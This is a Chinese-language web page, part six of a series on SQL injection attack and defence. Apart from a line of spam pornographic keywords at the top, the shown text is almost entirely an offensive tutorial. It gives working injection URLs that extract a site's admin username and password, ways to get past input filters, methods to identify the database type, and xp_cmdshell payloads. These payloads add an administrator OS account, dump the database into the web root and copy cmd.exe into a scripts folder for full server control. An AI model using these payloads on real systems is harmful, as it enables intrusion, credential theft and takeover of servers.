六月丁香五月婷婷,丁香五月婷婷网,欧美激情网站,日本护士xxxx,禁止18岁天天操夜夜操,18岁禁止1000免费,国产福利无码一区色费

學習啦>學習電腦>電腦安全>網絡安全知識>

SQL注入漏洞的攻防策略(6)

時間: 若木632 分享

  好,接下來我們就取該表的字段名

  http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1

  col_name(object_id(admin),1) from admin) where id=103534;--

  得到第1個字段為:id

  http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1

  col_name(object_id(admin),2) from admin) where id=103534;--

  得到第2個字段為:username

  http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1

  col_name(object_id(admin),3) from admin) where id=103534;--

  得到第2個字段為:password

  到此,管理員列表的3個關鍵字段已經給我們拿到,接下來要拿用戶名和密碼就比較省力了,首先拿

  管理員的id值,這個比較簡單,我就不再詳細說了。

  我們拿到的id值是44

  http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1

  username from admin where id=44) where id=103534;--

  將該管理員的用戶名更新到email項 ,拿到的username為:gscdjmp3

  http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1

  password from admin where id=44) where id=103534;--

  將該管理員的密碼更新到email項,拿到的password為:XZDC9212CDJ

  怎么樣,拿到密碼了吧?

  SQL注入不完全思路與防注入程序

  <一>SQL注入簡介

  許多網站程序在編寫時,沒有對用戶輸入數據的合法性進行判斷,使應用程序存在安全隱患。用戶可

  以提交一段數據庫查詢代碼,(一般是在瀏覽器地址欄進行,通過正常的www端口訪問)根據程序返回的結

  果,獲得某些他想得知的數據,這就是所謂的SQL Injection,即SQL注入。

  <二>SQL注入思路

  思路最重要。其實好多人都不知道SQL到底能做什么呢?這里總結一下SQL注入入侵的總體的思路:

  1. SQL注入漏洞的判斷,即尋找注入點

  2. 判斷后臺數據庫類型

  3. 確定XP_CMDSHELL可執(zhí)行情況;若當前連接數據的帳號具有SA權限,且master.dbo.xp_cmdshell擴

  展存儲過程(調用此存儲過程可以直接使用操作系統(tǒng)的shell)能夠正確執(zhí)行,則整個計算機可以通過幾種

  方法完全控制,也就完成了整個注入過程,否則繼續(xù):

  1. 發(fā)現WEB虛擬目錄

  2. 上傳ASP木馬;

  3. 得到管理員權限

  具體步驟:

  一、SQL注入漏洞的判斷

  如果以前沒玩過注入,請把IE菜單-工具-Internet選項-高級-顯示友好HTTP錯誤信息前面的勾去掉

  。

  為了把問題說明清楚,以下以HTTP://www.163.com/news.asp?id=xx(這個地址是假想的),為例進行

  分析,xx可能是整型,也有可能是字符串。

  1、整型參數的判斷

  當輸入的參數xx為整型時,通常news.asp中SQL語句原貌大致如下:

  select * from 表名 where 字段=xx,所以可以用以下步驟測試SQL注入是否存在。

  最簡單的判斷方法

  HTTP://www.163.com/news.asp?id=xx’(附加一個單引號),

  此時news.asp中的SQL語句變成了

  select * from 表名 where 字段=xx’,

  如果程序沒有過濾好“’”的話,就會提示 news.asp運行異常;但這樣的方法雖然很簡單,但并不

  是最好的,因為:

  first,不一定每臺服務器的IIS都返回具體錯誤提示給客戶端,如果程序中加了cint(參數)之類語句

  的話,SQL注入是不會成功的,但服務器同樣會報錯,具體提示信息為處理 URL 時服務器上出錯。請和系

  統(tǒng)管理員聯絡。

  second,目前大多數程序員已經將“’“ 過濾掉,所以用” ’”測試不到注入點,所以一般使用經

  典的1=1和1=2測試方法,見下文:

  HTTP://www.163.com/news.asp?id=xx and 1=1, news.asp運行正常,

  而且與HTTP://www.163.com/news.asp?id=xx運行結果相同;

  HTTP://www.163.com/news.asp?id=xx and 1=2, news.asp運行異常;(這就是經典的 1=1 1=2 判斷方法

  )

  如果以上面滿足,news.asp中就會存在SQL注入漏洞,反之則可能不能注入。

  2、字符串型參數的判斷

  方法與數值型參數判斷方法基本相同

  當輸入的參數xx為字符串時,通常news.asp中SQL語句原貌大致如下:

  select * from 表名 where 字段='xx',所以可以用以下步驟測試SQL注入是否存在。

  HTTP://www.163.com/news.asp?id=xx’(附加一個單引號),此時news.asp中的SQL語句變成了

  select * from 表名 where 字段=xx’,news.asp運行異常;

  HTTP://www.163.com/news.asp?id=xx and '1'='1', news.asp運行正常,

  而且與HTTP://www.163.com/news.asp?id=xx運行結果相同;

  HTTP://www.163.com/news.asp?id=xx and '1'='2', news.asp運行異常;

  如果以上滿足,則news.asp存在SQL注入漏洞,反之則不能注入

  3、特殊情況的處理

  有時ASP程序員會在程序員過濾掉單引號等字符,以防止SQL注入。此時可以用以下幾種方法試一試。

  ①大小定混合法:由于VBS并不區(qū)分大小寫,而程序員在過濾時通常要么全部過濾大寫字符串,要么

  全部過濾小寫字符串,而大小寫混合往往會被忽視。如用SelecT代替select,SELECT等;

 ?、赨NICODE法:在IIS中,以UNICODE字符集實現國際化,我們完全可以IE中輸入的字符串化成UNICODE

  字符串進行輸入。如+ =%2B,空格=%20 等;URLEncode信息參見附件一;

 ?、跘SCII碼法:可以把輸入的部分或全部字符全部

  <4>出了上述方法以外,還有個更簡單的方法就是使用現成的工具像NB聯盟的NBSI就是一款很不錯

  的工具,目前最新的版本為2.2

  二、判斷數據庫類型

  不同的數據庫的函數、注入方法都是有差異的,所以在注入之前,我們還要判斷一下數據庫的類型。

  一般ASP最常搭配的數據庫是Access和SQLServer,網上超過99%的網站都是其中之一。

  怎么讓程序告訴你它使用的什么數據庫呢?來看看:

  SQLServer有一些系統(tǒng)變量,如果服務器IIS提示沒關閉,并且SQLServer返回錯誤提示的話,那可以

  直接從出錯信息獲取,方法如下:

  HTTP://www.163.com/news.asp?id=xx;and user>0

  這句語句很簡單,但卻包含了SQLServer特有注入方法的精髓,我自己也是在一次無意的測試中發(fā)現

  這種效率極高的猜解方法。讓我看來看看它的含義:首先,前面的語句是正常的,重點在and user>0,

  我們知道,user是SQLServer的一個內置變量,它的值是當前連接的用戶名,類型為nvarchar。拿一個

  nvarchar的值跟int的數0比較,系統(tǒng)會先試圖將nvarchar的值轉成int型,當然,轉的過程中肯定會出錯

  ,SQLServer的出錯提示是:將nvarchar值 ”abc” 轉換數據類型為 int

  的列時發(fā)生語法錯誤,呵呵,abc正是變量user的值,這樣,不廢吹灰之力就拿到了數據庫的用戶名。在

  以后的篇幅里,大家會看到很多用這種方法的語句。 順便說幾句,眾所周知,SQLServer的用戶sa是個等

  同Adminstrators權限的角色,拿到了sa權限,幾乎肯定可以拿到主機的 Administrator了。上面的方法

  可以很方便的測試出是否是用sa登錄,要注意的是:如果是sa登錄,提示是將”dbo”轉換成int的列發(fā)生

  錯誤,而不是”sa”。

  如果服務器IIS不允許返回錯誤提示,那怎么判斷數據庫類型呢?我們可以從Access和SQLServer和區(qū)

  別入手,Access和

  SQLServer都有自己的系統(tǒng)表,比如存放數據庫中所有對象的表,Access是在系統(tǒng)表[msysobjects]中,但

  在Web環(huán)境下讀該表會提示“沒有權限”,SQLServer是在表[sysobjects]中,在Web環(huán)境下可正常讀取。

  在確認可以注入的情況下,使用下面的語句:

  HTTP://www.163.com/news.asp?id=xx ;and (select count(*) from sysobjects)>0

  HTTP://www.163.com/news.asp?id=xx ;and (select count(*) from msysobjects)>0

  如果數據庫是SQLServer,那么第一個網址的頁面與原頁面HTTP://www.163.com/news.asp?id=xx是大

  致相同的;而第二個網址,由于找不到表msysobjects,會提示出錯,就算程序有容錯處理,頁面也與原

  頁面完全不同。

  如果數據庫用的是Access,那么情況就有所不同,第一個網址的頁面與原頁面完全不同;第二個網址

  ,則視乎數據庫設置是否允許讀該系統(tǒng)表,一般來說是不允許的,所以與原網址也是完全不同。大多數情

  況下,用第一個網址就可以得知系統(tǒng)所用的數據庫類型,第二個網址只作為開啟IIS錯誤提示時的驗證。

  三、確定XP_CMDSHELL可執(zhí)行情況

  若當前連接數據的帳號具有SA權限,且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以

  直接使用操作系統(tǒng)的shell)能夠正確執(zhí)行,則整個計算機可以通過以下幾種方法完全控制,以后的所有步

  驟都可以省

  1、HTTP://www.163.com/news.asp?id=xx and user>;0 news.asp執(zhí)行異常但可以得到當前連接數據

  庫的用戶名(若顯示dbo則代表SA)。

  2、HTTP://www.163.com/news.asp?id=xx and db_name()>0 news.asp執(zhí)行異常但可以得到當前連接

  的數據庫名。

  3、HTTP://www.163.com/news.asp?id=xx;exec master..xp_cmdshell “net user aaa bbb /add”

  -- (master是SQL-SERVER的主數據

  庫;名中的分號表示SQL-SERVER執(zhí)行完分號前的語句名,繼續(xù)執(zhí)行其后面的語句;“—”號是注解,表示

  其后面的所有內容僅為注釋,系統(tǒng)并不執(zhí)行)可以直接增加操作系統(tǒng)帳戶aaa,密碼為bbb。

  4、HTTP://www.163.com/news.asp?id=xx;exec master..xp_cmdshell “net localgroup

  administrators aaa /add”-- 把剛剛增加

  的帳戶aaa加到administrators組中。

  5、HTTP://www.163.com/news.asp?id=xx;backuup database 數據庫名 to

  disk='c:/inetpub/wwwroot/save.db' 則把得到的數據內容

  全部備份到WEB目錄下,再用HTTP把此文件下載(當然首選要知道WEB虛擬目錄)。

  6、通過復制CMD創(chuàng)建UNICODE漏洞

  HTTP://www.163.com/news.asp?id=xx;exec master.dbo.xp_cmdshell “copy

  c:/winnt/system32/cmd.exe

  c:/inetpub/scripts/cmd.exe” 便制造了一個UNICODE漏洞,通過此漏洞的利用方法,便完成了對整

  個計算機的控制(當然首選要知道WEB虛擬目錄)。

  這樣你就成功的完成了一次SQL注入攻擊,先別興奮,在實踐時你就會發(fā)現這比理論要難的多會有更

  多的困難等著你come over ,下面GO ON如果上述條件不成立則需繼續(xù)奮斗(要掛馬了:))

75367